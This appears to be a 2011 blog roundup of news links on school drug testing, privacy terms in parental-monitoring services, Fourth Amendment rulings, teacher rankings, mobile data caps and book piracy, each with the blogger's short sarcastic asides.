The Board of Education will vote Wednesday on a plan to randomly test sixth, seventh and eighth graders to see if they are under the influence of drugs. School administrators said they were confident the proposal would pass.

Elementary School Principal Sandra Szabocsik said school officials want to use the testing “as a deterrent.” 'If we don't get pay raises, we might move on to “cavity searches!” Bob]

Read more on CBS News. Before you throw something at the wall, do note that the administrators say that this program will be voluntary and will require both student and parental consent for participation. [“Nah nah na nah na! Your parents think you're a druggie!” Bob] They also say that no one will be turned in to the police or suspended if they test positive.

But what happens to children who refuse to participate? Will they be viewed as having ‘something to hide’ or be treated differently in subtle or unconscious – if not conscious – ways by school personnel?

John Wesley Hall of sees this as a blatant Fourth Amendment violation. He’s the expert, but I’m not sure I understand how a “voluntary” program is a blatant Fourth Amendment violation. I hope he’ll clarify/educate me on that.

(Related) Who are we supposed to be protecting?

Parental Monitoring Carries Risks

January 12, 2011 by Dissent

A press release from was so strongly worded that I held off posting it until I could check into some of its assertions, but after checking, I think it’s worth posting this to alert parents to check more before signing up for any service:, an anti-sexting and anti-bullying business promoted by stockholder and former U.S. Secretary of Education William Bennett, offers its online monitoring services to parents who may be unaware they are giving up family privacy, according to a new report by School Safety Partners.

Parents who register with MouseMail may not realize they are granting MouseMail the right to publish all private messages and photos their families transmit through the system.

Although parents may cancel the texting and email-sniffing service at any time, MouseMail still keeps the right to publish in any way the family content stored on company servers. also reserves the right to turn over any personal information or messages to law enforcement agencies without first notifying parents or children. [Since they own everything, they could also sell it to the National Enquirer, right? Bob]

The MouseMail team includes Bennett, Fox News regulars Frank Luntz and Angela McGlowan, and McGlowan’s husband, John Venners, as president. The company uses social media and viral marketing, along with non-profit endorsements in the hopes of attracting millions of subscribers nationwide.

School Safety Partners explains that parents surrender privacy the moment they request a free MouseMail trial. The MouseMail trial registration form includes a small text box that contains a 5500-word contract. By scrolling down to line 775 of the text box contract, parents are advised of their irrevocable loss of privacy. Clause 17 states:

“With respect to any Content or User Content that You upload to the Service or transmit through the Service, You hereby grant Safe Communications, Inc. a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publically perform, publicly display, and distribute that Content and User Content, the subject of the Content and other data.”

School Safety Partners finds that privacy and liability risks crop up in the terms of service and privacy policies of most MouseMail competitors as well. Over 20 companies now offer online monitoring services to parents alarmed by the way children connect today.

Before using online services to monitor their children, parents are urged by School Safety Partners to ask themselves these questions about privacy and liability issues:

1. Does the service company acquire all rights to publish my family’s private messages?

2. Does the service company have the right to turn over my family’s messages to authorities without my authorization or without first notifying me?

3. What are my obligations to the service company if a matter is to be resolved privately?

4. Will I be adequately notified about any changes to the company’s privacy policy?

5. Does my child’s school have a policy about confiscating and searching cell phones? If so, how does it conflict with my parental monitoring and controls?

6. What are the legal consequences of preserving or deleting incriminating messages? How should offensive content be preserved or deleted?

7. Am I obligated to report criminal activity or serious risk behavior that the service brings to my attention?

8. In my state, what are the legal consequences of sexting, cyber-bullying, forwarding third-party offensive messages, issuing threats of violence, and other online criminal activities?

9. How long does the service company store my family’s messages and online activity logs?

10. Will my family’s private information be accessible for investigations centered around other families, or for out-of-state or national investigations?

For in-depth coverage of anti-bullying policies and other school safety issues, visit School Safety Partners at

Clever strategy. Let everyone fight over US Health Records while IBM captures the rest of the world...

IBM to digitize records for Russian hospitals

For my Disaster Recovery students. Think of it as a massively redundant network... Sort of what the Internet was intended to be.

Breaking bottlenecks

A new algorithm enables much faster dissemination of information through self-organizing networks with a few scattered choke points.

As sensors that do things like detect touch and motion in cell phones get smaller, cheaper and more reliable, computer manufacturers are beginning to take seriously the decade-old idea of “smart dust” — networks of tiny wireless devices that permeate the environment, monitoring everything from the structural integrity of buildings and bridges to the activity of live volcanoes. In order for such networks to make collective decisions, however — to, say, recognize that a volcano is getting restless — they need to integrate information gathered by hundreds or thousands of devices.

… It turns out that if you’re a sensor in a network with high connectivity — one in which any device can communicate directly with many of the others — simply selecting a neighboring device at random each round and sending it all the information you have makes it likely that every device’s information will permeate the whole network. But take two such highly connected networks and connect them to each other with only one link — a bottleneck — and the random-neighbor algorithm no longer works well.

It's on the Internet, so it must be true...

F. Lee Bailey: Paper proves OJ Simpson's innocence

In the 20,000-word document, F. Lee Bailey tells of four people who could have bolstered Simpson's case but never testified. He also gives an overview of the sensational trial from his own perspective.

Simpson was found not guilty. Most Americans are convinced that he is guilty, Bailey said, but the document might persuade some doubters that he is innocent.

Bailey wrote the document, "The Simpson Verdict," in 2007 as a proposal for a book that never materialized. He published it on his website Sunday.


“Gee, we never thought they would cheat...”

Florida cancels online learner's permit test after finding over 50% can't pass test in real life [w/video]

For the past decade, potential new drivers had the option of taking their permit test online. This practice just came to a screeching halt when they found that a large percentage of drivers passing the online test failed the in-person version. How large? Over 50 percent.

If you have time...

Tuesday, January 11, 2011

Free Webinar - Google's Advanced Search Options

This Thursday, January 13, Google is hosting a free webinar titled Beyond the First Five Links. The webinar will introduce participants to using the advanced search tools located in the left hand panel of the search results page. Participants will learn how to discover new content without having to form complex search terms. The webinar is free, but you do have to register to participate. The webinar will be live at 3:30pm EST.

Tuesday, January 11, 2011

Flash! Not all teachers are created equal! Union stunned!

NY: Judge rules Dept. of Education can release names, job rankings of public school teachers

January 10, 2011 by Dissent

Jose Martinez reports:

A Manhattan judge ruled Monday that the Department of Education can release the names and job rankings of more than 12,000 public school teachers.

The decision by Justice Cynthia Kern is a blow to the United Federation of Teachers, which tried to block the DOE from making the internal ratings system public.

The union has argued the data is flawed – and releasing wrong information to the public could destroy careers.

In a 10-page decision, Kern noted that the union’s concerns over privacy are outweighed by public interest in how teachers perform – and pointed out that the courts have repeatedly held that the release of job-related information is not an invasion of privacy.

Read more in the New York Daily News

California, thy name is Boondoggle.

New California driver's licenses so complex, manufacturer has struggled to get them right

When the California Department of Motor Vehicles unveiled a newly designed driver's license last fall -- the first major revision in a decade -- officials touted sophisticated security features that promised to make the cards easier to use and harder to fake.

The cardholder's signature and birth date would be raised, so they could be felt. Hidden images would be revealed only by ultraviolet light, and a perforated outline of the California brown bear would be visible when a flashlight was pressed against the back of the card.

DMV Director George Valverde said the vendor, L-1 Identity Solutions, has struggled with color accuracy, the raised lettering and the positioning of images of California icons, including El Capitan in Yosemite and the Golden Gate Bridge. L-1 was the only bidder on the five-year, $63-million job, Valverde said.

It sounds techie, but it's really more complicated than that. It's a legal thing...

Hospital Wireless Networks May Be Regulated Medical Devices

"As hospitals continue to connect patient monitoring equipment, physician PDAs and laptops to wireless networks, and then collapse those data paths onto traditional IT networks, the closer the US Food and Drug Administration comes to regulating them, according to Computerworld. The focus of the FDA's regulation comes in its recently finalized 80001-1 standard that established risk management practices for those networks, the adherence to which may be voluntary, but would determine Medicaid and Medicare reimbursements. 'If you don't comply, then you have two choices. You can have the federal government come in and inspect your hospital, or you can decide not to accept money from Medicare or Medicaid. Voluntary sometimes isn't exactly voluntary,' said Rick Hampton, wireless communications manager for Partners HealthCare System in Boston."

Another reason I'm not a lawyer. How can it be permissible to rely on something you didn't know about?

Fifth Circuit Permits Warrantless Government Searches Based on Previous Private Search Not Known To Police

January 10, 2011 by Dissent

Orin Kerr writes:

Last week the Fifth Circuit handed down a significant decision on the “private search” doctrine in Fourth Amendment law, United States v. Oliver. Oliver permits warrantless searches under the private search doctrine even when the police who conducted the search didn’t know about the private search. I don’t think the private search doctrine can extend so far, and in this post I hope to explain why I think the decision is wrong. I also want to explain why a different Fourth Amendment rule, the “apparent authority” doctrine, very possibly applies to the facts of this case. The apparent authority doctrine was not litigated in the Oliver case, but it should have been. If I’m right about that, the Oliver decision may have reached a plausible result but did so using a rationale that is quite troubling and likely to cause more problems in the future.

Read more on The Volokh Conspiracy.

Exemplars of “Truth, Justice and the Copyright Way?”

Record Labels To Pay For Copyright Infringement

"Sony Music Entertainment Canada Inc., EMI Music Canada Inc., Universal Music Canada Inc. and Warner Music Canada Co. have agreed to pay songwriters and music publishers $47.5 million in damages for copyright infringement and overdue royalties to settle a class action lawsuit. 'The 2008 class action alleges that the record companies "exploited" music owners by reproducing and selling in excess of 300,000 song titles without securing licenses from the copyright owners and/or without paying the associated royalty payments. The record companies knowingly did so and kept a so-called "pending list" of unlicensed reproductions, setting aside $50 million for the issue, if it ever arose, court filings suggest.'"

“Yeah, we're changing the contract. So what?”

T-Mobile Slashes Fair Use Policy, Says Download At Home

"T-Mobile in the UK has revealed a new fair use policy, cutting caps from 1GB and 3GB to 500MB, saying mobile browsing doesn't include videos or large downloads. 'If you want to download, stream and watch video clips, save that stuff for your home broadband,' the company said. All those people who have bought smartphones with the aim of doing such things on the go may not agree with the mobile operator, however. Any user that goes over the new limit won't be charged, but will be blocked from downloading or streaming for the rest of the month."

(Related) ...and if they charge for “excess” data, here's a phone to avoid.

Microsoft Looking Into Windows Phone 7's 'Excessive' Data Use

"A few users are complaining that Windows Phone 7 is eating data plans alive. One user estimates idle data usage at 3-5 Mb per hour. Not good for a phone which seems to be struggling against Android and iPhone."

(Related) How to take advantage of your competitors weakness...

Verizon To Offer iPhone Users Unlimited Data

"The WSJ reports that Verizon Wireless, the country's largest wireless carrier, is confident enough in its network that it will offer unlimited data-use plans when it starts selling the iPhone around the end of this month, a person familiar with the matter says. Such plans would provide a key means of distinguishing its service from rival AT&T Inc., which limits how much Internet data its customers may use each month. Verizon has a lot at stake as it starts to carry the iPhone, which it is expected to announce Tuesday at an event in New York City. Verizon, more than any other US carrier, has built its reputation on its network quality, and any stumble in handling iPhone traffic will call into question Verizon's major selling point. On the other hand, if it does handle the iPhone well, then AT&T will have a harder time arguing it didn't mismanage its own network. Anthony J. Melone, Verizon's chief technology officer, says the company has invested heavily in its 3G network to handle surging smartphone traffic, including nine million Android subscribers, up from none a year earlier.'"

I'll go a bit farther with Baen. They often include a CD in their books, with the entire catalog of books by that author! I copy the CD (they encourage it) and send it to my fellow Sci Fi nuts, many of whom have started reading Baen authors (and buying the books because, like me, they have trouble focusing their bifocals on a computer screen.)

Book Piracy — Less DRM, More Data

"Ambiguity surrounds the real impact of digital book piracy, notes Brian O'Leary in an interview with O'Reilly Radar, but all would be better served if more data was shared and less effort was exerted on futile DRM. 'The publishing industry should be working as hard as we can to develop new and innovative business models that meet the needs of readers. And what those look like could be community-driven. I think of Baen Books, for example, which doesn't put any DRM restrictions on its content but is one of the least pirated book publishers. As to sales, Paulo Coelho is a good example. He mines the piracy data to see if there's a burgeoning interest for his books in a particular country or market. If so, he either works to get his book out in print or translate it in that market.'"